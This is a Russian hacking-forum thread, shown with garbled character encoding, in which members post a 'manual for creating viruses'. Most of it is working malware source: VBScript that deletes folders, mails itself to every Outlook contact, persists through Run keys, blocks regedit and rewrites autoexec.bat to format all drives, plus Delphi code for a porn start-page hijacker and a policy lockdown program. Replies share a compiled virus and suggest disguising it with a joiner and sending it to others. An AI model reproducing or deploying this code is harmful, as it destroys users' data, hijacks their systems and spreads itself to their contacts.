PXkod - Ïðîãðàììèðîâàíèå è Áåçîïàñíîñòü â ñåòè...

Îáúÿâëåíèå

Äðóçüÿ:

Óâàæàåìûå ãîñòè! Ïîæàëóéñòà ðåãèñòðèðóéòåñü.
Âíèìàíèå! Íåêîòîðûå ôîðóìû/ðàçäåëû îòêðûâàþòñÿ òîëüêî ïîñëå ðåãèñòðàöèè.



>Ïðàâèëà ôîðóìà<

>Íàáîð ìîäåðàòîðîâ!<

Èíôîðìàöèÿ î ïîëüçîâàòåëå

Ïðèâåò, Ãîñòü! Âîéäèòå èëè çàðåãèñòðèðóéòåñü.

ìàíóàë

Ñòðàíèöà: 1

Ñîîáùåíèé 1 ñòðàíèöà 16 èç 16

1

  • Àâòîð: Gull
  • Þçåð
  • Gull
  • Çàðåãèñòðèðîâàí: 2007-12-26
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 30
  • Óâàæåíèå: [+6/-0]
  • Ïîçèòèâ: [+1/-0]
  • Ïðîâåë íà ôîðóìå:
    3 ÷àñà 26 ìèíóò
  • Ïîñëåäíèé âèçèò:
    2008-08-26 02:23:28

~Ìàíóàë ïî ñîçäàíèþ âèðóñà~ íà VBS! (' - óêàçàííûå íèæå àáçàöû íå ïðîïèñûâàòü)
-------------------------------------------------------------
Íó íà÷íåì.......
Îòêðûâàåì ïðîñòîé áëîêíîò (ïðè ïîìîùè áëîêíîòà ìîæíî ñîçäàòü ïî÷òè ÷òî óãîäíî)......È ïðîïèñûâàåì îñíîâíîå íà÷àëî íàøåãî âèðóñà:

CODE' àáçàö
Set f = CreateObject("scripting.filesystemobject")
Set s = CreateObject("Wscript.Shell")
t=0: on error resume next
Set os = CreateObject("Shell.Application")
set ie = WScript.CreateObject("InternetExplorer.Application")
Set oe = WScript.CreateObject("Outlook.Application")

Òàê íà÷èíêó ñäåëàëè....
Òåïåðü ÿ ïðîïèøó ÂÀÌ îñíîâíûå äåéñòâèÿ âèðóñà:..... 

1) Ñäåëàåì òàê ÷òîáû ïîñëå îòêðûòèÿ íàøåãî ïðîåêòà ó þçâåðà âûñêî÷èëî ñîîáùåíèå: 
CODE'     Âûâåñòè ñîîáùåíèå
s.popup "text1", , "text2", 0+16

text1 - ñàìî ñîîáùåíèå
text2 - çàãîëîâîê ñîîáùåíèÿ

0+x - òèï ñîîáùåíèÿ
(0+0) - îáû÷íûé òèï
(0+16) - îøèáêà
(0+64) - èíôîðìàöèÿ
(0+48) - âîñêëèöàíèå
(0+32) - âîïðîñ

2) Íàì íóæíî ÷òî-òî ïåðåèìåíîâàòü....
CODE' Ïåðåèìåíîâàíèå âñåõ ôàéëîâ, íàõîäÿùèõñÿ íà Ðîáî÷åì ñòîëå íà "text"
For Each Folder In s.SpecialFolders
if right(folder,12)="Ðàáî÷èé ñòîë" then
set tf=f.getfolder(folder)
set af=tf.files
For Each fl In af
set file=f.getfile(fl):t=t+1
file.name="text" & t
next
end if
next

text - íîâûé òåêñò!
-------------------------------------

' Ïåðåèìåíîâàíèå ïàïêè Ìîè äîêóìåíòû íà "Íîâîå_Íàçâàíèå"
For Each Folder In s.SpecialFolders
if right(folder,13)="Ìîè äîêóìåíòû" then
set tf=f.getfolder(folder): tf.name="Íîâîå_Íàçâàíèå"
End if
next
------------------------------------

' Ïåðåèìåíîâàíèå âñåõ ôàéëîâ, íàõîäÿùèõñÿ â Ìîèõ äîêóìåíòàõ íà "Íîâîå_íàçâàíèå"
For Each Folder In s.SpecialFolders
if right(folder,13)="Ìîè äîêóìåíòû" then
set tf=f.getfolder(folder)
set af=tf.files
For Each fl In af
set file=f.getfile(fl):t=t+1
file.name="ÍÀÇÂÀÍÈÅ" & t
next
end if
next
------------------------------------

' Ïåðåèìåíîâàíèå âñåõ ôàéëîâ, íàõîäÿùèõñÿ â Ãëàâíîå ìåíþ\Ïðîãðàììû íà "íîâîå_íàçâàíèå"
For Each Folder In s.SpecialFolders
if right(folder,12)="Ãëàâíîå ìåíþ" then
set tf=f.getfolder(folder)
set af=tf.subfolders
For Each fl In af
set file=f.getfolder(fl):t=t+1
file.name="íîâîå_íàçâàíèå" & t
next
end if
next

3) Íàì íóæíî ÷òî-òî ïåðåìåñòèòü:

CODE' Ïåðåìåùåíèå Ðàáî÷åãî ñòîëà â "FOLDER"
For Each Folder In s.SpecialFolders
if right(folder,12)="Ðàáî÷èé ñòîë" then
f.copyfolder folder, "FOLDER"
f.deletefolder folder, true
next

(folder - ïàïêà)
--------------------------------------

' Ïåðåìåùåíèå ïàïêè Ìîè äîêóìåíòû â "ïàïêà"
For Each Folder In s.SpecialFolders
if right(folder,13)="Ìîè äîêóìåíòû" then
f.copyfolder folder, "ïàïêà"
f.deletefolder folder, true
next

4) ......Èíòåðíåò 
CODE
' Ñäåëàòü äîìàøíåé ñòðàíèöó "http:\\hack-all.net"
s.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http:\\hack-all.net"
----------------------------------------

' Ïåðåéòè íà ñàéò "http:\\hack-all.net"
ie.Visible = True
ie.Navigate "http:\\hack-all.net"
----------------------------------------

' Ðàçîñëàòü âèðóñ Âñåì êîíòàêòàì íåïðèÿòåëÿ
For Index = 1 To oe.GetNameSpace("MAPI").AddressLists(1).count
Set OutMail = oe.CreateItem(0)
OutMail.to = oe.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
OutMail.Subject = "â òåìå ïèñüìà"
OutMail.Body = "â òåëå ïèñüìà"
OutMail.Attachments.Add WScript.ScriptFullName
OutMail.Send
Next

5) Óäàëÿåì íóæíûå îáúåêòû....
CODE'     Óäàëåíèå ñïåöèàëüíûõ ïàïîê
For Each Folder In s.SpecialFolders
-------------------------------------------------

' Óäàëåíèå Ðàáî÷åãî ñòîëà
f.deletefolder s.SpecialFolders ("Desktop"),true
-------------------------------------------------

' Óäàëåíèå Aplication Data
if right(folder,15)="Aplication Data" then f.deletefolder folder,true
-------------------------------------------------

' Óäàëåíèå PrintHood
if  right(folder,9)="PrintHood"  then f.deletefolder folder,true
-------------------------------------------------

' Óäàëåíèå ShellNew
if right(folder,8)="ShellNew" then f.deletefolder folder,true
-------------------------------------------------

' Óäàëåíèå øðèôòîâ
if right(folder,5)="FONTS" then f.deletefolder folder,true
-------------------------------------------------

' Óäàëåíèå NetHood
if right(folder,7)="NetHood" then f.deletefolder folder,true
-------------------------------------------------

' Óäàëåíèå Ãëàâíîå ìåíþ
if right(folder,12)="Ãëàâíîå ìåíþ" then f.deletefolder folder,true
-------------------------------------------------

' Óäàëåíèå SendTo
if right(folder,6)="SendTo" then f.deletefolder folder,true
-------------------------------------------------

' Óäàëåíèå Recent
if right(folder,6)="Recent" then f.deletefolder folder,true
-------------------------------------------------

' Óäàëåíèå Àâòîçàãðóçêà
if right(folder,12)="Àâòîçàãðóçêà" then f.deletefolder folder,true
-------------------------------------------------

' Óäàëåíèå Èçáðàííîå
if right(folder,9)="Èçáðàííîå" then f.deletefolder folder,true
-------------------------------------------------

' Óäàëåíèå Ìîè äîêóìåíòû
if right(folder,13)="Ìîè äîêóìåíòû" then f.deletefolder folder,true
-------------------------------------------------

' Óäàëåíèå Ïðîãðàììû
if right(folder,9)="Ïðîãðàììû" then f.deletefolder folder,true
Next

6) Î÷åíü âðåäîíîñíîå....... (äåëàòü íå ñîâåòóþ)
CODE'     Ïîìåíÿòü ôóíêöèè êëàâèø ìûøêè ìåñòàìè
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SwapNT", "rundll32 user32, SwapMouseButton"
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Swap98", "rundll32.exe user.exe, swapmousebutton"
s.Run "rundll32 user32, SwapMouseButton"
-------------------------------------------------

'     Âûðóáèòü êëàâèàòóðó(Òîëüêî äëÿ Windows 95,98,Me)
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Dead", "rundll32 keyboard,disable"
s.Run "rundll32.exe keyboard.exe, disable"
-------------------------------------------------

'     Îòêëþ÷èòü ìûøü(Òîëüêî äëÿ Windows 95,98,Me)
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Mad", "rundll32 mouse,disable"
s.Run "rundll32.exe mouse.exe, disable"
-------------------------------------------------

' Ìèíèìèçèðîâàòü âñå îêíà
os.MinimizeAll
-------------------------------------------------

' Çàïóñêàòüñÿ ïðè êàæäîé ïåðåçàãðóçêå
Set File2 = f.GetFile(WScript.ScriptFullName)
File2.Copy ("c:\windows\System\Gigabyte.vbs")
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
-------------------------------------------------

' Áëîêèðîâàòü RegEdit(÷òîá ó íåãî íå çàâîäèëñÿ ðåäàêòîð ðååñòðà).Äëÿ òîãî ÷òîáû ðàçáëîêèðîâàòü ïðîèñâîéòå DisableRegistryTools çíà÷åíèå - 0
s.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD"
-------------------------------------------------

'      Ôîðìàòèðîâàòü Âñå äèñêè (Òîëüêî äëÿ Windows 95,98,Me)
If f.FileExists("d:\autoexec.bat") Then Str ="d:\autoexec.bat"
If f.FileExists("d:\Windows.000\autoexec.bat") Then Str ="d:\Windows.000\autoexec.bat"
If f.FileExists("d:\Windows\autoexec.bat") Then Str ="d:\Windows\autoexec.bat"
If f.FileExists("c:\autoexec.bat") Then Str = "c:\autoexec.bat"
If f.FileExists("c:\Windows.000\autoexec.bat") Then Str = "c:\Windows.000\autoexec.bat"
If f.FileExists("c:\Windows\autoexec.bat") Then Str = "c:\Windows\autoexec.bat"
Set ab = f.GetFile(Str)
ab.Attributes = 0
Set autoexec = f.CreateTextFile(Str)
autoexec.WriteLine "@cls"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.WriteLine "@format d: /q /autotest"
autoexec.WriteLine "@format e: /q /autotest"
autoexec.WriteLine "@format f: /q /autotest"
autoexec.WriteLine "@format g: /q /autotest"
autoexec.WriteLine "@format h: /q /autotest"
autoexec.WriteLine "@format i: /q /autotest"
autoexec.Close
s.Run Str, 5
-------------------------------------------------

'     Ïåðåçàãðóçèòü êîìïüþòåð(Òîëüêî äëÿ Windows 95,98,Me)
s.Run "Rundll32.exe User.exe,ExitWindows"
-------------------------------------------------

'     Ñàìîëèêâèäèðîâàòüñÿ
f.deletefile WScript.ScriptFullName, true

+2

2

  • Àâòîð: Lamassy
  • Àäìèíèñòðàòîð
  • Lamassy
  • Çàðåãèñòðèðîâàí: 2007-09-12
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 631
  • Óâàæåíèå: [+9/-0]
  • Ïîçèòèâ: [+31/-2]
  • Ïîë: Ìóæñêîé
  • Ïðîâåë íà ôîðóìå:
    11 äíåé 22 ÷àñà
  • Ïîñëåäíèé âèçèò:
    2017-05-21 21:26:31

Gull, +1, ñïàñèá, äàâíî èñêàë ñòàòüþ ïî ñîçäàíèþ âèðåé íà VBS

0

3

  • Àâòîð: Gull
  • Þçåð
  • Gull
  • Çàðåãèñòðèðîâàí: 2007-12-26
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 30
  • Óâàæåíèå: [+6/-0]
  • Ïîçèòèâ: [+1/-0]
  • Ïðîâåë íà ôîðóìå:
    3 ÷àñà 26 ìèíóò
  • Ïîñëåäíèé âèçèò:
    2008-08-26 02:23:28

Äîáðîãî âðåìåíè ñóòîê! Ñåãîäíÿ ìû íàïèøåì ïðîñòîé, íî ïîäëûé âèðóñ - Trojan.StartPage.1505 (ïî êëàññèôèêàöèè Dr.WEB).
Âîò åãî äåéñòâÿ:

Âèðóñ ïðîïèñûâåò URL http://teen-biz.com/ â ñëåäóþùèå êëþ÷è ñèñòåìíîãî ðååñòðà:
[HKCU\Software\Microsoft\Internet Explorer\Main\Start Page]
[HKCU\Software\Microsoft\Internet Explorer\Main\Use Search Asst]
[HKCU\Software\Microsoft\Internet Explorer\Main\Search Page]
[HKCU\Software\Microsoft\Internet Explorer\Main\Search Bar]
[HKCU\Software\Microsoft\Internet Explorer\SearchURL]
[HKCU\Software\Microsoft\Internet Explorer\SearchURL\provide]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\SearchAssistant]. È ýòî åùå íå âñå! Â ïàïêå "Èçáðàííîå" îí ñîçäàåò ñëåäóþùèå ññûëêè:

Quality Galleries 50 000 freepics and movie.url
http://www.terra.es/personal8/banners1/

WOW VIDEOS AND PICS -- REALLY HARDCORE VIDEOS.url
http://www.terra.es/personal8/banners2

Series Hardcore Pic Sets and Movies.url
http://fujit.drocherway.com/cgi-bin/r.cgi?from=2

Elite Teen Sites - Adult portal The Best TEEN SITES.url
http://eliteteensites.com/

Elite Mature Sites - Adult portal The Best Mature Sites.url
http://elitematuresites.com/

FULL COLLECTION DIRTY PORNO.url
http://teen-biz.com/

Young Teen Fucking Great Lo Archives.url
http://toteen.com/cgi-bin/tds/in.cgi?outgo

Ïðèìåðíî êàæäûå 1,5 ÷àñà òðîÿíñêàÿ ïðîãðàììà îòêðûâàåò â áðàóçåðå ñëåäóþùóþ ñòðàíèöó:
http://toteen.com/cgi-bin/tds/in.cgi?outgo.

Çàïîäëî? Ëàäíî, äàâàé ïèñàòü. Îòêðûâàé Äåëüôè è ñîçäàâàé íîâûé ïðîåêò.

Äàëåå óäàëÿåì Unit1 è âñå ëåâûå ñòðîêè èç Project1. Ó âàñ äîëæíî ïîëó÷èòüñÿ ñëåäóþùåå:

program Project1;

uses
Windows, registry, ShellAPI;

begin

end.

Îáúÿâëÿåì ïåðåìåííûå â ñïèñêå ïåðåìåííûõ:

Var Reg:TRegistry;
F: TextFile;
I: Integer;

Äàëåå ïèøåì îñíîâíîé êîä:

Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_Current_User;

Reg.OpenKey('Software\Microsoft\Internet Explorer\Main',true);
Reg.WriteString('Start Page','http://teen-biz.com/');
Reg.WriteString('Use Search Asst','http://teen-biz.com/');
Reg.WriteString('Search Page','http://teen-biz.com/');
Reg.WriteString('Search Bar','http://teen-biz.com/');
Reg.CloseKey;

Reg.OpenKey('Software\Microsoft\Internet Explorer',true);
Reg.WriteString('SearchURL','http://teen-biz.com/');
Reg.CloseKey;

Reg.OpenKey('Software\Microsoft\Internet Explorer\SearchURL',true);
Reg.WriteString('provide','http://teen-biz.com/');
Reg.CloseKey;

Reg.OpenKey('Software\Microsoft\Internet Explorer\Search',true);
Reg.WriteString('SearchAssistant','http://teen-biz.com/');
Reg.CloseKey;

Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',true);

AssignFile(f, Reg.ReadString('Favorites') + '/Quality Galleries 50 000 freepics and movie.url');
Rewrite(f);
Writeln(f,'[InternetShortcut]');
Writeln(f,'URL=http://www.terra.es/personal8/banners1/');
Close(f);

AssignFile(f, Reg.ReadString('Favorites') + '/WOW VIDEOS AND PICS -- REALLY HARDCORE VIDEOS.url');
Rewrite(f);
Writeln(f,'[InternetShortcut]');
Writeln(f,'URL=http://www.terra.es/personal8/banners2');
Close(f);

AssignFile(f, Reg.ReadString('Favorites') + '/Series Hardcore Pic Sets and Movies.url');
Rewrite(f);
Writeln(f,'[InternetShortcut]');
Writeln(f,'http://fujit.drocherway.com/cgi-bin/r.cgi?from=2');
Close(f);

Íó âîò â ïðèíöèïå è âñå! Êîìïèëèðóé è ïðîâåðÿé!!!

0

4

  • Àâòîð: Gull
  • Þçåð
  • Gull
  • Çàðåãèñòðèðîâàí: 2007-12-26
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 30
  • Óâàæåíèå: [+6/-0]
  • Ïîçèòèâ: [+1/-0]
  • Ïðîâåë íà ôîðóìå:
    3 ÷àñà 26 ìèíóò
  • Ïîñëåäíèé âèçèò:
    2008-08-26 02:23:28

Ïðèâåò âñåì, êòî çàøåë ñþäà. Ñåãîäíÿ ìû íàïèøåì îïàñíûé âèðóñ. Äåñòðóêòèâíàÿ àêòèâíîñòü âèðóñà òàêîâà: ïðîãðàììà áëîêèðóåò ÁÎËØÓÞ êó÷ê íàñòðîåê ñèñòåìû, ïîñëå ÷åãî ïðèõîäèòüñÿ ïåðåóñòàíàâëèâàòü âèíäó (îïûòíûé ïîëüçîâàòåëü â ïðèíöèïå ìîæåò âîññòàíîâèòü ñèñòåìó). Ñåé÷àñ ìû íàïèøåì òàêîé ïðèêîë:

Ñîçäàäèì íîâûé ïðîåêò è îáúÿâèì íîâóþ ïåðåìåííóþ Reg, êîòîðàÿ áóäåò ðàáîòàòü ñ ðååñòðîì. Òåïåðü íàïèøåì îñíîâíîé êîä:

program Win32;

uses
  REgistry,
  Windows;

var Reg: TRegistry;

{$R Win32.res}

begin
Reg:=TRegistry.Create;  // Îòêðûâàåì ðååñòð
Reg.RootKey:=HKEY_CURRENT_USER;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WRiteInteger('NoActiveDesktop',1);  // Áëîêèðóåì ActiveDesktop
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall',true);
Reg.WriteInteger('NoAddRemovePrograms',1); // Áëîêèðóåì Óñòàíîâêó è óäàëåíèå ïðîãðàìì
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WriteInteger('NoAddPrinter',1); // Áëîêèðóåì äîáàâëåíèå íîâîãî ïðèíòåðà
Reg.CloseKey;
Reg.OpenKey('Software\Policies\Microsoft\Internet Explorer\Restrictions',true);
Reg.WriteInteger('NoFileOpen',1);  // Áëîêèðóåì âîçìîæíîñòü îòêðûòü ôàéë â IE
Reg.CloseKey;
Reg.OpenKey('Software\Policies\Microsoft\Internet Explorer\Restrictions',true);
Reg.WriteInteger('NoBrowserSaveAs',1); // Áëîêèðóåì âîçìîæíîñòü ñîõðàíèòü ñòðàíè÷êó â IE
Reg.CloseKey;
Reg.OpenKey('Software\Policies\Microsoft\Internet Explorer\Restrictions',true);
Reg.WriteInteger('NoBrowserContextMenu',1); // Áëîêèðóåì êîíòåêñòíîå ìåíþ â IE
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\System',true);
Reg.WriteInteger('NoDispCPL',1);  // Áëîêèðóåì íàñòðîéêè ýêðàíà
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoChangeStartMenu',1); // Áëîêèðóåì êîíòåêñòíîå ìåíþ Ïóñê
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoClose',1);   // Áëîêèðóåì âîçìîæíîñòü âûêëþ÷èòü âèíäó
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoCommonGroups',1); // Áëîêèðóåì ïðèëîæåíèÿ â Ïóñê-Âñå ïðîãðàììû
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WriteInteger('NoCustomizeWebView',1); // Áëîêèðóåì íàñòðîéêó âèäà ïàïêè
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoPrinterTabs',1); // Ñêðûâàåì íåêîòîðûå âêëàäêè â Ñâîéñòâàõ ïðèíòåðà
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WriteInteger('NoDesktop',1); // Ñêðûâàåì íåêîòîðûå âêëàäêè â Ñâîéñòâàõ ïðèíòåðà
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoFind',1); // Ñêðûâàåì âîçìîæíîñòü ïîèñêà ôàéëîâ (Ïóñê - Ïîèñê ôàéëîâ)
Reg.CloseKey;
Reg.OpenKey('SOFTFARE\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WriteInteger('NoFileMenu',1); // Áëîêèðóåì ìåíþ "Ôàéë" â IE è Ïðîâîäíèêå
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoFolderOptions',1); // Áëîêèðóåì ñâîéñòâà ïàïêè
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoRun',1); // Áëîêèðóåì çàïóñê êîìàíäíîé ñòðîêè
Reg.CloseKey;
Reg.Free;
end.

Âîò è âñå!

0

5

  • Àâòîð: BOFH
  • Àäìèíèñòðàòîð
  • BOFH
  • Çàðåãèñòðèðîâàí: 2008-02-14
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 122
  • Óâàæåíèå: [+15/-1]
  • Ïîçèòèâ: [+15/-0]
  • Ïîë: Æåíñêèé
  • Ïðîâåë íà ôîðóìå:
    1 äåíü 8 ÷àñîâ
  • Ïîñëåäíèé âèçèò:
    2011-02-12 03:40:18

Gull
+1. Ñïàñèáî çà ñòàòüè!

0

6

  • Àâòîð: Lamassy
  • Àäìèíèñòðàòîð
  • Lamassy
  • Çàðåãèñòðèðîâàí: 2007-09-12
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 631
  • Óâàæåíèå: [+9/-0]
  • Ïîçèòèâ: [+31/-2]
  • Ïîë: Ìóæñêîé
  • Ïðîâåë íà ôîðóìå:
    11 äíåé 22 ÷àñà
  • Ïîñëåäíèé âèçèò:
    2017-05-21 21:26:31

êñòàòü, âîò ïîïðîáîâàë ñäåëàòü ðàäè ïðèêîëà =)
Îïèñàíèå: Âûâîäèò ñîîáùåíèå "Ïðèâåò Êóñêàì!" + ïåðåèìåíîâûâàåò ïàïêó "Ìîè äîêóìåíòû" â "Ìîÿ ïîìîéêà=)" +
+ äåëàåò ñàéò http://pxkod.bbok.ru äîìàøíåé ñòðàíèöåé + ïðîèçâîäèò ïåðåõîä íà ñàéò http://pxkod.bbok.ru + ðàññûëàåò ñåáÿ
âñåì êîíòàêòàì â àäðåñíîé êíèã
òîêà ÿ äóìàþ ìàëî êòî çàõî÷èò çàïóñêàòü ó ñåáÿ ôàéë ñ ðàñøèðåíèåì *.VBS=(

êà÷àòü

0

7

  • Àâòîð: BOFH
  • Àäìèíèñòðàòîð
  • BOFH
  • Çàðåãèñòðèðîâàí: 2008-02-14
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 122
  • Óâàæåíèå: [+15/-1]
  • Ïîçèòèâ: [+15/-0]
  • Ïîë: Æåíñêèé
  • Ïðîâåë íà ôîðóìå:
    1 äåíü 8 ÷àñîâ
  • Ïîñëåäíèé âèçèò:
    2011-02-12 03:40:18
{Lio} íàïèñàë(à):

òîêà ÿ äóìàþ ìàëî êòî çàõî÷èò çàïóñêàòü ó ñåáÿ ôàéë ñ ðàñøèðåíèåì *.VBS=(

Çàïèõíè ýòîò ôàéë â .åõå-øíèê)))

0

8

  • Àâòîð: Lamassy
  • Àäìèíèñòðàòîð
  • Lamassy
  • Çàðåãèñòðèðîâàí: 2007-09-12
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 631
  • Óâàæåíèå: [+9/-0]
  • Ïîçèòèâ: [+31/-2]
  • Ïîë: Ìóæñêîé
  • Ïðîâåë íà ôîðóìå:
    11 äíåé 22 ÷àñà
  • Ïîñëåäíèé âèçèò:
    2017-05-21 21:26:31

íó ïðîñòî ïåðåèìåíîâàòü íå ïîëó÷èëîñü))
à â ãóãëå èñêàòü êàê ïåðåäåëàòü ëåíü äà è âðåìåíè îñîáî íåò

0

9

  • Àâòîð: BOFH
  • Àäìèíèñòðàòîð
  • BOFH
  • Çàðåãèñòðèðîâàí: 2008-02-14
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 122
  • Óâàæåíèå: [+15/-1]
  • Ïîçèòèâ: [+15/-0]
  • Ïîë: Æåíñêèé
  • Ïðîâåë íà ôîðóìå:
    1 äåíü 8 ÷àñîâ
  • Ïîñëåäíèé âèçèò:
    2011-02-12 03:40:18
{Lio} íàïèñàë(à):

íó ïðîñòî ïåðåèìåíîâàòü íå ïîëó÷èëîñü))

Ëèî, òû ÷åãî)))
×òîáû êîíêðåòíûå ïðîãè íå èñêàòü, ìîæíî âîîáùå äæîéíåðîì âñ¸ ýòî ñäåëàòü)
Çàîäíî è èêîíêó ïðèñâîèøü.
Áîëåå ïðàâäîïîäîáíî áóäåò)

0

10

  • Àâòîð: WasD
  • Ó÷àñòíèê
  • Çàðåãèñòðèðîâàí: 2008-02-05
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 145
  • Óâàæåíèå: [+16/-0]
  • Ïîçèòèâ: [+4/-0]
  • Ïðîâåë íà ôîðóìå:
    20 ÷àñîâ 41 ìèíóòó
  • Ïîñëåäíèé âèçèò:
    2010-06-19 12:10:32

Äåñòðóêòèâíóþ ñïîñîáíîñòü òàêîãî âèðóñà äîâîëüíî ïðîñòî ñâåñòè íà íåò, åñëè õîòü ÷óòîê øàðèòü ðååñòð ))  Ìíå êàæåòüñÿ ïåðâûì äåëîì íàäî áëîêèðîâàòü äîñòóï ê ðååñòðó.... õîòÿ íàäåæíåé ïðîñòî ôîðìàòèòü ëîêàëüíûå äèñêè :p

0

11

  • Àâòîð: BOFH
  • Àäìèíèñòðàòîð
  • BOFH
  • Çàðåãèñòðèðîâàí: 2008-02-14
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 122
  • Óâàæåíèå: [+15/-1]
  • Ïîçèòèâ: [+15/-0]
  • Ïîë: Æåíñêèé
  • Ïðîâåë íà ôîðóìå:
    1 äåíü 8 ÷àñîâ
  • Ïîñëåäíèé âèçèò:
    2011-02-12 03:40:18

WasD íî äåñòðóêòèâ èíîãäà ãëóï è ðåäêî ïðèâåòñòâóåòñÿ. )
Òîëüêî ïî íàäîáíîñòè. )
À ðååñòð - ýòî äà.
Ïðàâäà ÿ äî ñèõ ïîð íå ìîãó çàïîìíèòü, êàêèå êëþ÷è òàì íàäî ÷èñòèòü... ))))

0

12

  • Àâòîð: Lamassy
  • Àäìèíèñòðàòîð
  • Lamassy
  • Çàðåãèñòðèðîâàí: 2007-09-12
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 631
  • Óâàæåíèå: [+9/-0]
  • Ïîçèòèâ: [+31/-2]
  • Ïîë: Ìóæñêîé
  • Ïðîâåë íà ôîðóìå:
    11 äíåé 22 ÷àñà
  • Ïîñëåäíèé âèçèò:
    2017-05-21 21:26:31

÷åòà ÿ ñ êàæäûì äíåì âñå òóïëþ è òóïëþ=(

âîò â îáùåì ñêà÷àòü

0

13

  • Àâòîð: WasD
  • Ó÷àñòíèê
  • Çàðåãèñòðèðîâàí: 2008-02-05
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 145
  • Óâàæåíèå: [+16/-0]
  • Ïîçèòèâ: [+4/-0]
  • Ïðîâåë íà ôîðóìå:
    20 ÷àñîâ 41 ìèíóòó
  • Ïîñëåäíèé âèçèò:
    2010-06-19 12:10:32
{Lio} íàïèñàë(à):

âîò â îáùåì ñêà÷àòü

Âîò ýòî òû êðóò XD Íå õî÷ó ñêà÷èâàòü ôàéë vir_1.exe

0

14

  • Àâòîð: Lamassy
  • Àäìèíèñòðàòîð
  • Lamassy
  • Çàðåãèñòðèðîâàí: 2007-09-12
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 631
  • Óâàæåíèå: [+9/-0]
  • Ïîçèòèâ: [+31/-2]
  • Ïîë: Ìóæñêîé
  • Ïðîâåë íà ôîðóìå:
    11 äíåé 22 ÷àñà
  • Ïîñëåäíèé âèçèò:
    2017-05-21 21:26:31

WasD, íó òàê ñêà÷àé, ïåðåèìåíóþ è êèíü êîìó-íèòü =)
+ îïèñàíèå ÿ âûøå äàâàë - îí ïî ñóòè áåçâðåäíûé=)

0

15

  • Àâòîð: WasD
  • Ó÷àñòíèê
  • Çàðåãèñòðèðîâàí: 2008-02-05
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 145
  • Óâàæåíèå: [+16/-0]
  • Ïîçèòèâ: [+4/-0]
  • Ïðîâåë íà ôîðóìå:
    20 ÷àñîâ 41 ìèíóòó
  • Ïîñëåäíèé âèçèò:
    2010-06-19 12:10:32

Ëàäíî, âèðóñîïèñàêè, ñåé÷àñ ïîêàæó âàì îäíó øòóêåíöèþ ïîëåçíóþ. Ñàì ïðèäóìàë, íî ïî ìàíóàëó Ãóëëà
Áëîêèðîâàíèå ðåãèñòðà íà VBS áóäåò âûãëÿäåòü òàê:

Òåïåðü, ïîëåçíûé èç ýòîãî âûâîä. Ïðåäñòàâèì, ÷òî èç-çà âèðóñà íåêîãî Õ (èìåííî Õ, à íå Èêñ) ó âàñ íå îòêðûâàåòñÿ ðååñòð. Âíèçó - ïðîãà íà òîì æå VBS äëÿ ðàçáëîêèðîâàíèÿ ðååñòðà

